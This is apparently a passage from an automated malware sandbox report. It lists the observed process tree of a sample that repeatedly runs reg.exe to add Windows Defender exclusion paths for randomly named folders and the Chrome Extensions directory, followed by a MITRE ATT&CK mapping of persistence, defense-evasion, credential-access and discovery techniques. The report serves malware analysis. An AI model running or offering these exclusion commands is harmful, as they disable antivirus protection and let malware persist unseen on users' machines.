    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kBSTQLPmGKYTJCAhkkR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4864
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kBSTQLPmGKYTJCAhkkR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5184
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wLfJQuAadbUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:876
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wLfJQuAadbUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2484
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpRaYhcvJOtU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5168
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpRaYhcvJOtU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3752
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ZkSlxqOxvEFNINVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5492
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ZkSlxqOxvEFNINVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3816
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5900 -ip 5900
1⤵
PID:5576

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery